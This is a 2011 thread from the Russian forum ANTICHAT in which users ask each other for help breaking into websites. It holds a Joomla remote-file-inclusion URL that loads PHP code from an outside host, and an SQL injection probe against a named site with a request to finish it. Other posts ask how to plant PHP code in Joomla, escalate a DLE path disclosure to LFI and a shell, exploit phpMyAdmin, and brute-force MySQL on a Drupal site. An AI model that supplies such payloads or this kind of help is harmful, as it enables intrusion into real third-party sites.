HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.09.2011, 03:04
Юго
Познающий
Регистрация: 02.02.2011
Сообщений: 63
Провел на форуме:
13201

Репутация: 17
По умолчанию

Цитата:
Сообщение от Severyna  
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
exploit:

http://joomla/index.php?mosConfig_absolute_path=http://site.ru/php.txt

Хотя уязвимости джумлы больше зависят от компонентов которые в ней установлены чем от версии.

Попробуй в компонентах баги поищи
 
Ответить с цитированием

  #2  
Старый 23.09.2011, 21:50
TimKim
Новичок
Регистрация: 22.09.2011
Сообщений: 1
Провел на форуме:
345

Репутация: 0
По умолчанию

http://tosnoshield.ru

http://tosnoshield.ru//index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='2

Можете помочь скуль доделать?
 
Ответить с цитированием

  #3  
Старый 24.09.2011, 01:12
S-J
Познающий
Регистрация: 24.09.2010
Сообщений: 84
Провел на форуме:
22681

Репутация: 0
По умолчанию

Подскажите как можно вставить сторонний PHP код в джумлу имея ФТП с полными правами + доступ к БД..

пробовал через БД в модули сунуть но отображается просто как текст а не как пхп код...

с инклудами в пхп файлы тоже не получается, ошибки выдает после инклуда, наверное не правильно инклуд делаю хотя тут хз, если можно как то инклудить то подскажите правильный инклуд в файлы.
 
Ответить с цитированием

  #4  
Старый 30.09.2011, 00:22
~{OmRus}~
Новичок
Регистрация: 27.08.2011
Сообщений: 24
Провел на форуме:
8471

Репутация: 1
По умолчанию

Как узнавать дижок сайта , и версию?
 
Ответить с цитированием

  #5  
Старый 30.10.2011, 22:36
=strelok=
Новичок
Регистрация: 29.10.2011
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

подскажите какие уязвимости есть в phpmyadmin 3.4.3.1 если можно поподробнее что можно придумать....
 
Ответить с цитированием

  #6  
Старый 30.10.2011, 22:43
=strelok=
Новичок
Регистрация: 29.10.2011
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от ~{OmRus}~  
Как узнавать дижок сайта , и версию?
/showthread.php?t=141298

/showthread.php?t=231084
 
Ответить с цитированием

  #7  
Старый 21.11.2011, 19:32
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422

Репутация: 0
По умолчанию

Здравствуйте. Нарвался на старую уязвимость в Dle , версии 8.2 . Почитав форум и просмотрев видео не смог понять как именно сформировать LFI. Дошёл только до вывода раскрытия путей:



Скажите - можно ли что-нибудь ещё сделать? Либо это предел? Прошу помочь, если не сложно.
 
Ответить с цитированием

  #8  
Старый 22.11.2011, 14:30
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Aniweste  
Здравствуйте. Нарвался на старую уязвимость в Dle , версии 8.2 . Почитав форум и просмотрев видео не смог понять как именно сформировать LFI. Дошёл только до вывода раскрытия путей:

Скажите - можно ли что-нибудь ещё сделать? Либо это предел? Прошу помочь, если не сложно.
Сам по себе вывод путей ничего не даёт, кроме абсолютного пути для возможного шелла.
 
Ответить с цитированием

  #9  
Старый 01.12.2011, 01:12
medoxx
Новичок
Регистрация: 23.11.2011
Сообщений: 11
Провел на форуме:
2353

Репутация: 0
По умолчанию

Drupal

Детали: сайт на drupal 5.6/7, install.php в свободном доступе, имя базы данных и пользователь - известны.

Вопрос: Можно задействовать только брутфорс mysql или же есть другой вариант получить доступ?

Пожалуйста, по существу...
 
Ответить с цитированием

  #10  
Старый 04.12.2011, 23:37
medoxx
Новичок
Регистрация: 23.11.2011
Сообщений: 11
Провел на форуме:
2353

Репутация: 0
По умолчанию

Цитата:
Сообщение от medoxx  
Детали: сайт на drupal 5.6/7, install.php в свободном доступе, имя базы данных и пользователь - известны.
Вопрос: Можно задействовать только брутфорс mysql или же есть другой вариант получить доступ?
Пожалуйста, по существу...
АУУУУ ЕСТЬ КТО ЖИВОЙ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.